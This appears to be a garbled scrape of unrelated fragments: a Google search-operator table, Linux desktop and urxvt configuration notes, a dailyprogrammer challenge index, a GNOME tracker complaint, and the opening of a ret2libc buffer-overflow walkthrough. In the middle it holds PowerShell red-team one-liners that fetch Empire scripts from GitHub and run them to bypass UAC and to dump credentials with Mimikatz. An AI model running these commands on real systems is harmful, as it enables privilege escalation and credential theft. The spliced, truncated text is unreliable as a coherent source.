| Filter | Description | Example |
|---|---|---|
| allintext | Searches for occurrences of all the keywords given. | allintext:"keyword" |
| intext | Searches for the occurrences of keywords all at once or one at a time. | intext:"keyword" |
| inurl | Searches for a URL matching one of the keywords. | inurl:"keyword" |
| allinurl | Searches for a URL matching all the keywords in the query. | allinurl:"keyword" |
| intitle | Searches for occurrences of keywords in title all or one. | intitle:"keyword" |
| Openbox | |
| Tint2 | |
| Urxvt | |
| lxappearance | |
| breeze dark | |
| for system-wide mouse configuration, one can edit /usr/share/icons/default/index.theme | |
| tint2conf is the customizer | |
| sudo xbps-query -Rs rxvt |
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
A stack buffer overflow occurs when a program writes to a memory address on it's call stack outside of the intended structure / space.
In this walk-through, I'm going to cover the ret2libc (return-to-libc) method. This method of exploitation is great because it doesn't require the use of your typical shellcode. It involves making sys calls to the functions provided to us by libc (standard c library). We're going to use the system and exit sys calls for demonstration.
To have a good understanding about how stack overflows work, it's extremely helpful to know how stack data structures work, and more importantly - how the call stack works. For the sake of time, I'm not going to type out how these two things work in great detail. If you want to know how these work, I would recommend watching stack and call stack.
| All challenges. I lied a bit, these are actually in **reverse** chronological order, to make it less annoying to use on mobile devices. | |
| Easy | Intermediate | Hard | Weekly/Bonus | |
| -----|--------------|------|------------- | |
| | []() | []() | []() | **-** | | |
| | [[2016-02-22] Challenge #255 [Easy] Playing with light switches](/r/dailyprogrammer/comments/46zm8m/20160222_challenge_255_easy_playing_with_light/) | [[2016-02-24] Challenge #255 [Intermediate] Ambiguous Bases](/r/dailyprogrammer/comments/47docs/20160224_challenge_255_intermediate_ambiguous/)| [[2016-02-26] Challenge #255 [Hard] Hacking a search engine](/r/dailyprogrammer/comments/47o4b6/20160226_challenge_255_hard_hacking_a_search/) | **-** | | |
| | [[2016-02-16] Challenge #254 [Easy] Atbash Cipher](/r/dailyprogrammer/comments/45w6ad/20160216_challenge_254_easy_atbash_cipher/)| [[2016-02-17] Challenge #254 [Intermediate] Finding Legal Reversi Moves](/r/dailyprogrammer/comments/468pvf/20160217_challenge_254_intermediate_finding_legal/)| [[2016-02-19] Challenge #25 |
GNOME's tracker is a CPU and privacy hog. There's a pretty good case as to why it's neither useful nor necessary here: http://lduros.net/posts/tracker-sucks-thanks-tracker/
After discovering it chowing 2 cores, I decided to go about disabling it.
Directories
| !! cd /usr/lib/urxvt/perl; git clone https://github.com/muennich/urxvt-perls . | |
| !! Perl extensions | |
| URxvt.perl-ext-common: default,clipboard,matcher,keyboard-select | |
| !! URLs | |
| URxvt.keysym.C-U: perl:url-select:select_next | |
| URxvt.url-launcher: /usr/bin/firefox -new-tab | |
| URxvt.underlineURLs: True | |
| URxvt.matcher.button: 1 |